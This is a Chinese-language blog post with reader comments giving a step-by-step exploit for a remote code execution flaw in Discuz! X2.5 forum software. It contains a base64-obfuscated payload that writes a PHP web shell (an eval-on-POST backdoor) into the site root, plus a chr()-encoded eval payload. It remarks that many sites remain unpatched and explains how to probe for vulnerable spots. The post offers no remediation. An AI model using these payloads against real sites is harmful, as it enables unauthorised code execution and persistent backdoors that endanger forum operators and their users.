您的位置 » 首页 » 实用工具 » Discuz X2.5 最新GetShell 0day 详细利用方法

Discuz X2.5 最新GetShell 0day 详细利用方法

发表于5年前 | 作者: seay | 分类: 实用工具 | 孵化于:2012年06月05日 | 文章热度:29,171 次 全屏阅读

显示不全请点击全屏阅读

听说Discuz!这次又出漏洞了,这次还是个GetShell漏洞呀。这个漏洞比较新,应该很多站还没更新吧。影响版本有:20120407,beta,rc
 
Discuz! X2.5 Release 20120407版中的preg_replace使用了e修饰符和双引号,
 
在实现上存在远程命令执行漏洞,远程攻击者可利用此漏洞执行远程任意代码。
 
要成功利用此漏洞需要目标启用seo功能。
 
下面说下利用方法
 
1.注册任意账户
 
2.登陆用户,发表blog日志(注意是日志)
 
3.添加图片,选择网络图片,地址写入 ↓
 
 {${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}}
 
4.访问日志,论坛根目录下生成demo.php,一句发密码c 
 
 
漏洞要开启seo,并且开启用户日志的seo,漏洞鸡肋,黑站就算了。
补充一下吧,开seo没错,但是并非他说的非得开日志的seo,我上面文章中说的 “各种地方比如 source/include/space/space_blog.php,
 
懂的都懂了” 只是随便提个例子而已,其实在任何能够发表文章的地方都可以,最简单的,论坛找个板块发贴子就行,
 
这主要看管理员开启了哪个位置的seo,如果不知道管理员开了哪的seo就到处都发一下。
利用方式也并非非得发blog,也不是非得发网络图片,详细的利用我是比如随便发个贴子,内容
 
${${eval(chr(112).chr(104).chr(112).chr(105).chr(110).chr(102).chr(111).chr(40).chr(41).chr(59))}}
然后给他加上任意超链接,发布即可phpinfo(),enjoy it :)

Tags:

漏洞利用,

如果您喜欢我的博客,欢迎点击图片定订阅到邮箱填写您的邮件地址,订阅我们的精彩内容: 也可以点击链接【订阅到鲜果】

如果我的想法或工具帮助到了你,也可微信扫下方二维码打赏本人一杯咖啡


来自 Seay互联网安全博客
本文地址:http://www.cnseay.com/155/
文章版权说明请看置顶文章,尊重作者,转载请以链接形式标明原文地址

马上分享给你的朋友吧~

已经有3个筒子的人留下了脚印...

  • 阿德马 说:
    1楼
    2012 年 11 月 7 日 下午 12:10 回复

    :mrgreen: 原来如此,昨天还在问有木有人利用成功……

    今天就看到了.了解了~

  • 【管理员】seay 说:
    2楼
    2012 年 11 月 7 日 下午 12:12 回复

    @阿德马
    上半年的洞了

发表评论

你的大名(必填)

你的邮箱(必填)

评论内容(必填)